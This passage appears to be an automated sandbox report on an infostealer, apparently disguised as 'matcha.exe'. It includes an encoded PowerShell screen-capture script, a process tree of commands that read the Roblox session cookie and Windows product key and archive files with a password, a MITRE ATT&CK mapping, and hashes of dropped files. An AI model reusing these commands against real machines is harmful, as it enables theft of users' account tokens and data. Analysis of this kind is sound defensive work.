ACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4400
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3daymuqz\3daymuqz.cmdline"
        5⤵
        
        PID:1744
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2323.tmp" "c:\Users\Admin\AppData\Local\Temp\3daymuqz\CSC40AF48DE648648C38739CBB191C28D44.TMP"
        6⤵
        
        PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1072
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2072
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4544
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1044
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2124
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2616
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4756
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:368
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3000
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3696
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\duyoU.zip" *"
    3⤵
    PID:3312
  - - C:\Users\Admin\AppData\Local\Temp\_MEI39562\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI39562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\duyoU.zip" *
      4⤵
      Executes dropped EXE
      PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\matcha.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3944
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e3b6cc0fbea08a0831f0026a696db8b8

SHA1
4e32202d4700061cfd80d55e42798131c9f530d4

SHA256
3284cae7b82be99d93064390ba071ba4321f3f24dd21515b37b2ca9f31b2e8d5

SHA512
6a06856f360b48c8bc8a15ffb8d7a6604ec357bcb1d0fad5d71a2cb876929a7b67eb40ba4493998ab1bbae8cb71212e124276f27d5c138a135041c27a41a0b7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
35458dc8ec2c4ee9183a3508dd0f94aa

SHA1
01b5d80a70fa27565baa0d7d8eb15227a7264e2d

SHA256
e0dd622ad1a0085cae98391b7d3b96003fd82ded0ced4de080b025776b7191a5

SHA512
a483dccecb7bf55e96689c2f95095013266fb73eb1f340f1e9db2b83b417cf8642a50149e120f20d688294ba26483e0788c887bf4fbd1f5b8595d9bcafa8f914

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\3daymuqz\3daymuqz.dll

Filesize
4KB

MD5
c40723f8dd8c615e1bbabcf157e082df

SHA1
54a0bd5b7b677dd2236211763bf3a35696341e45

SHA256
daab61e55451f67978c60fd5fc91c25170cc6266069bd6f58b465f2ca4a2ec66

SHA512
117ae22a1f02f5e9fec76f6b238c6ecb6be7d007639af25f88ac0a504803896f9beb4cad13ef1aac9dcf963f4f217e9eff505eef185d3de8f3fdbc58e7079c4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2323.tmp

Filesize
1KB

MD5
6f88acf41f8f696672a959bee7e7a42e

SHA1
4a5977dedb9dc13686cc3a6715e25d013200afcc

SHA256
703f4a1f1ad37535ad30516c5bb0e3b0bba89a83b4af090d3bcf1d8c700aac7c

SHA512
74832debd153af24bfa919c9fd92a3a7c3d10dd8db58130dbb140afae489e9b5942519057d26db4353e690a087f99385c082758ef84e46a2665b5d584e141733

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\VCRUNTIME140.dll

Filesize
95KB

MD5
f34eb034aa4a9735218686590cba2e8b

SHA1
2bc20acdcb201676b77a66fa7ec6b53fa2644713

SHA256
9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

SHA512
d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_bz2.pyd

Filesize
81KB

MD5
86d1b2a9070cd7d52124126a357ff067

SHA1
18e30446fe51ced706f62c3544a8c8fdc08de503

SHA256
62173a8fadd4bf4dd71ab89ea718754aa31620244372f0c5bbbae102e641a60e

SHA512
7db4b7e0c518a02ae901f4b24e3860122acc67e38e73f98f993fe99eb20bb3aa539db1ed40e63d6021861b54f34a5f5a364907ffd7da182adea68bbdd5c2b535

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_ctypes.pyd

Filesize
120KB

MD5
1635a0c5a72df5ae64072cbb0065aebe

SHA1
c975865208b3369e71e3464bbcc87b65718b2b1f

SHA256
1ea3dd3df393fa9b27bf6595be4ac859064cd8ef9908a12378a6021bba1cb177

SHA512
6e34346ea8a0aacc29ccd480035da66e280830a7f3d220fd2f12d4cfa3e1c03955d58c0b95c2674aea698a36a1b674325d3588483505874c2ce018135320ff99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_decimal.pyd

Filesize
248KB

MD5
20c77203ddf9ff2ff96d6d11dea2edcf

SHA1
0d660b8d1161e72c993c6e2ab0292a409f6379a5

SHA256
9aac010a424c757c434c460c3c0a6515d7720966ab64bad667539282a17b4133

SHA512
2b24346ece2cbd1e9472a0e70768a8b4a5d2c12b3d83934f22ebdc9392d9023dcb44d2322ada9edbe2eb0e2c01b5742d2a83fa57ca23054080909ec6eb7cf3ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_hashlib.pyd

Filesize
63KB

MD5
d4674750c732f0db4c4dd6a83a9124fe

SHA1
fd8d76817abc847bb8359a7c268acada9d26bfd5

SHA256
caa4d2f8795e9a55e128409cc016e2cc5c694cb026d7058fc561e4dd131ed1c9

SHA512
97d57cfb80dd9dd822f2f30f836e13a52f771ee8485bc0fd29236882970f6bfbdfaac3f2e333bba5c25c20255e8c0f5ad82d8bc8a6b6e2f7a07ea94a9149c81e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_lzma.pyd

Filesize
154KB

MD5
7447efd8d71e8a1929be0fac722b42dc

SHA1
6080c1b84c2dcbf03dcc2d95306615ff5fce49a6

SHA256
60793c8592193cfbd00fd3e5263be4315d650ba4f9e4fda9c45a10642fd998be

SHA512
c6295d45ed6c4f7534c1a38d47ddc55fea8b9f62bbdc0743e4d22e8ad0484984f8ab077b73e683d0a92d11bf6588a1ae395456cfa57da94bb2a6c4a1b07984de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_queue.pyd

Filesize
30KB

MD5
d8c1b81bbc125b6ad1f48a172181336e

SHA1
3ff1d8dcec04ce16e97e12263b9233fbf982340c

SHA256
925f05255f4aae0997dc4ec94d900fd15950fd840685d5b8aa755427c7422b14

SHA512
ccc9f0d3aca66729832f26be12f8e7021834bbee1f4a45da9451b1aa5c2e63126c0031d223af57cf71fad2c85860782a56d78d8339b35720194df139076e0772

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_socket.pyd

Filesize
77KB

MD5
819166054fec07efcd1062f13c2147ee

SHA1
93868ebcd6e013fda9cd96d8065a1d70a66a2a26

SHA256
e6deb751039cd5424a139708475ce83f9c042d43e650765a716cb4a924b07e4f

SHA512
da3a440c94cb99b8af7d2bc8f8f0631ae9c112bd04badf200edbf7ea0c48d012843b4a9fb9f1e6d3a9674fd3d4eb6f0fa78fd1121fad1f01f3b981028538b666

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_sqlite3.pyd

Filesize
96KB

MD5
5279d497eee4cf269d7b4059c72b14c2

SHA1
aff2f5de807ae03e599979a1a5c605fc4bad986e

SHA256
b298a44af162be7107fd187f04b63fb3827f1374594e22910ec38829da7a12dc

SHA512
20726fc5b46a6d07a3e58cdf1bed821db57ce2d9f5bee8cfd59fce779c8d5c4b517d3eb70cd2a0505e48e465d628a674d18030a909f5b73188d07cc80dcda925

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\_ssl.pyd

Filesize
156KB

MD5
7910fb2af40e81bee211182cffec0a06

SHA1
251482ed44840b3c75426dd8e3280059d2ca06c6

SHA256
d2a7999e234e33828888ad455baa6ab101d90323579abc1095b8c42f0f723b6f

SHA512
bfe6506feb27a592fe9cf1db7d567d0d07f148ef1a2c969f1e4f7f29740c6bb8ccf946131e65fe5aa8ede371686c272b0860bd4c0c223195aaa1a44f59301b27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\base_library.zip

Filesize
859KB

MD5
3ae8624c9c1224f10a3135a7039c951f

SHA1
08c18204e598708ba5ea59e928ef80ca4485b592

SHA256
64dfc4067a99c71094b4a9aa8e50344e7d42ea9a0d376cbcd419c04e53384285

SHA512
c47ea6b8e004c27fa29e84f6363f97e775c83a239eb3ae75dedca79e69db02b431a586877ee8f948f83b522b00c20e6b1d5864628c2aef9e33e0be95fe6e3254

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\blank.aes

Filesize
74KB

MD5
63e8de14eb6b678348d32371eefe33bb

SHA1
87f609ebc69a90f93b55f4779cebf7e72a451816

SHA256
59661dce36e93cc99ce1459d4cbe13d99a6f3a14ddf0be62df605bdbde95dd10

SHA512
63a84e41c247993fe26df210950a7020c92f0c91e691ca2b6f56af5fb166f5bb4431e364e64726758fb87759871f64984b06660a391277a1fa8a5f24f0481fa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\libcrypto-1_1.dll

Filesize
3.3MB

MD5
9d7a0c99256c50afd5b0560ba2548930

SHA1
76bd9f13597a46f5283aa35c30b53c21976d0824

SHA256
9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939

SHA512
cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\libssl-1_1.dll

Filesize
688KB

MD5
bec0f86f9da765e2a02c9237259a7898

SHA1
3caa604c3fff88e71f489977e4293a488fb5671c

SHA256
d74ce01319ae6f54483a19375524aa39d9f5fd91f06cf7df238ca25e043130fd

SHA512
ffbc4e5ffdb49704e7aa6d74533e5af76bbe5db297713d8e59bd296143fe5f145fbb616b343eed3c48eceaccccc2431630470d8975a4a17c37eafcc12edd19f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\python310.dll

Filesize
4.3MB

MD5
63a1fa9259a35eaeac04174cecb90048

SHA1
0dc0c91bcd6f69b80dcdd7e4020365dd7853885a

SHA256
14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed

SHA512
896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\select.pyd

Filesize
29KB

MD5
a653f35d05d2f6debc5d34daddd3dfa1

SHA1
1a2ceec28ea44388f412420425665c3781af2435

SHA256
db85f2f94d4994283e1055057372594538ae11020389d966e45607413851d9e9

SHA512
5aede99c3be25b1a962261b183ae7a7fb92cb0cb866065dc9cd7bb5ff6f41cc8813d2cc9de54670a27b3ad07a33b833eaa95a5b46dad7763ca97dfa0c1ce54c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\sqlite3.dll

Filesize
1.4MB

MD5
914925249a488bd62d16455d156bd30d

SHA1
7e66ba53f3512f81c9014d322fcb7dd895f62c55

SHA256
fbd8832b5bc7e5c9adcf7320c051a67ee1c33fd198105283058533d132785ab4

SHA512
21a468929b15b76b313b32be65cfc50cad8f03c3b2e9bf11ca3b02c88a0482b7bc15646ce40df7fb42fbc96bd12362a54cffe0563c4ddc3fc78622622c699186

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39562\unicodedata.pyd

Filesize
1.1MB

MD5
81d62ad36cbddb4e57a91018f3c0816e

SHA1
fe4a4fc35df240b50db22b35824e4826059a807b

SHA256
1fb2d66c056f69e8bbdd8c6c910e72697874dae680264f8fb4b4df19af98aa2e

SHA512
7d15d741378e671591356dfaad4e1e03d3f5456cbdf87579b61d02a4a52ab9b6ecbffad3274cede8c876ea19eaeb8ba4372ad5986744d430a29f50b9caffb75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ju0guq2c.ig2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Desktop\ConvertOptimize.xlsx

Filesize
531KB

MD5
22f1a05eedc302a0a30fb5b0b11fe81d

SHA1
4078522603282f966c795d80f28c7374ac8e9c86

SHA256
1c76cb90eec745a42059a609b93613c8ab8cc4a36c856b418ef92c0bb372ccbe

SHA512
0c265af58cf05c6a9289a9f3d2faf7837a63283f9863db7b07dd95b7c5209cc6b9ecf48e44de24bd21845d7325b84a9e24b761d52939bbf4dc0158a3bfdf873d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Desktop\ImportPublish.jpeg

Filesize
423KB

MD5
28d7d66587b9a58a52f7302cb21f89d4

SHA1
3d345be8ce8e2873b3a1ad656ab7e5025622a6be

SHA256
d98379cf61e62cc9cf4d91ae54357e6cbd259483e2d4e778782ba1a93afd0ac1

SHA512
4ca84382b97c9ff1f88d2e98e66527ddf6a0385fdff675c5b2177f867fdec5e307a4989113871de4dabdf0879a75d3d315f95e55f0bd6cc5e128a1717b92e1e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Desktop\OpenResume.xlsx

Filesize
10KB

MD5
fdcc2b75cd6277fca1657af5e1c756ea

SHA1
5af3c50377e0ed278016a148f54affd86c89a754

SHA256
5f65a3c4525ffa50e07ec248e159ae182f06ccdd1bc421e7f858ea39d87e9ddf

SHA512
44bfec63464b3a7d37c3e80eb8998c86817004883d5dde79559899e6f004e3c71a41a02639f5e956262cfb364d68558985e9827a3905f499c553acd1ef349f18

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Desktop\RenameWrite.xlsx

Filesize
14KB

MD5
f26e499bdf141602958f46dcd697bc8c

SHA1
a1e2989a65473dfe1d302907b7f30ac9a2209e02

SHA256
91e765df9bb7c06d4e3be5899a823d2536c1a888b2c0621c4c21ede38c7a9f25

SHA512
be3c4c29573ed2c3adec769b6b61a36dc964a24e3c6c380556412f8b2b2fb9c528191baa6bb830ec7e0709ed73eba7edb92f50f07d982540e3512cf40d59a1d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Desktop\SendStart.docx

Filesize
603KB

MD5
2e63e167cb1e29ab86912b583f3035a5

SHA1
86362fdff8bba1dd80c765c3d60ef38057f9f8ea

SHA256
b9ede99d8854159d86b47fe07d5144f41372b77276488a0106fe552d3ad7b0d8

SHA512
40e8fb4e5e78d95a3a257ea864b7dea63dcb899f99b5eb131222d6bf2124493156471c3f8417f6d03da19b4a28305056ba4a80928afc2999e8a139584813af1b

Download Submit
